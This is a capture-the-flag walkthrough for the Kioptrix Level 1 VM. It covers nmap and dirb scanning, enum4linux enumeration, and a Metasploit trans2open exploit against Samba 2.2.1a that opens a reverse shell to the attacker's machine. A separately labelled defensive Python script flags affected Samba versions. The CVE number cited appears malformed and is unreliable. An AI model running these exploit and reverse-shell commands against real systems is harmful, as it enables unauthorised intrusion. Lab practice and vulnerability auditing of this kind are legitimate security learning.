Kioptrix Level 1 – Write Up

In this post, we’re going to walk through how to get a root shell on the Kioptrix Level 1 VM. First things first: after downloading and importing the VM, make sure its network adapter is set to host-only, and do the same for your Kali box. Without further ado, let’s get right to it.

Fire up nmap and kick off an intensive scan:

nmap -sT -A -T4 -p- -v 192.168.68.141 -oN /root/Desktop/nmap_results.txt

Looks like it’s running the Apache test page on ports 80 and 443, SSH on port 22, netbios-ssn on port 139, and rpcbind on port 111.

Fire up dirb and see if we can get anything interesting:

dirb http://192.168.68.141/ /usr/share/wordlists/dirb/common.txt

Well, turns out there is nothing useful on the webpage.

I tried to look for any mountable shares with no luck, but then I threw enum4linux at it and got a bunch of interesting information. The one that stuck out for me was that the VM is using Samba 2.2.1a, for which I know for a fact there is a Metasploit module (CVE-2003-201).

info exploit/linux/samba/trans2open
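
The same finding from the defender's side, as an added example that is not part of the original post: given version banners like the one enum4linux reported, flag hosts whose Samba version falls in the range the trans2open overflow affects. The range used (2.2.0 up to the fix in 2.2.8a) is an assumption taken from the public advisory, and every host other than the post's VM is constructed sample data.

```python
import re

# Half-open ranges [first_affected, first_fixed) for the trans2open overflow.
# Assumption: 2.2.0 up to the 2.2.8a fix, per the public advisory (not stated
# in the post). Add other branches from the vendor advisory as needed.
AFFECTED_RANGES = [((2, 2, 0, ""), (2, 2, 8, "a"))]

# Matches "Samba 2.2.1a", "Samba smbd 3.0.20-Debian", etc.
BANNER_RE = re.compile(r"Samba\s+(?:smbd\s+)?(\d+)\.(\d+)\.(\d+)([a-z]?)", re.I)


def parse_samba_version(banner):
    """Return (major, minor, patch, letter), or None if no exact version."""
    m = BANNER_RE.search(banner)
    if not m:
        return None  # e.g. "Samba smbd 3.X": too vague to judge
    major, minor, patch, letter = m.groups()
    return (int(major), int(minor), int(patch), letter.lower())


def assess(banner):
    """Classify a banner: 'affected', 'outside listed ranges' or 'unknown'."""
    version = parse_samba_version(banner)
    if version is None:
        return "unknown"  # needs a manual or authenticated version check
    for first_affected, first_fixed in AFFECTED_RANGES:
        if first_affected <= version < first_fixed:
            return "affected"
    return "outside listed ranges"


# Constructed sample inventory: host -> banner as a scanner might report it.
SAMPLE_BANNERS = {
    "192.168.68.141": "Samba 2.2.1a",  # the version reported in the post
    "host-b": "Samba 2.2.8a",
    "host-c": "Samba smbd 3.X (workgroup: MYGROUP)",
    "host-d": "Samba 3.0.20-Debian",
}


def audit(banners):
    """Map each host to its verdict."""
    return {host: assess(banner) for host, banner in banners.items()}


if __name__ == "__main__":
    for host, verdict in audit(SAMPLE_BANNERS).items():
        print(f"{host:16} {verdict}")
```

Banners without a full version number come back as "unknown" rather than being guessed at, so those hosts still need the package version checked directly.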

Fire up Metasploit and use the Samba exploit:

use /exploit/linux/samba/trans2open
set RHOST kioptrix
set LHOST kali
set LPORT 4545
set PAYLOAD generic/shell_reverse_tcp
exploit
uname -a
id

Bingo!

Happy hunting!
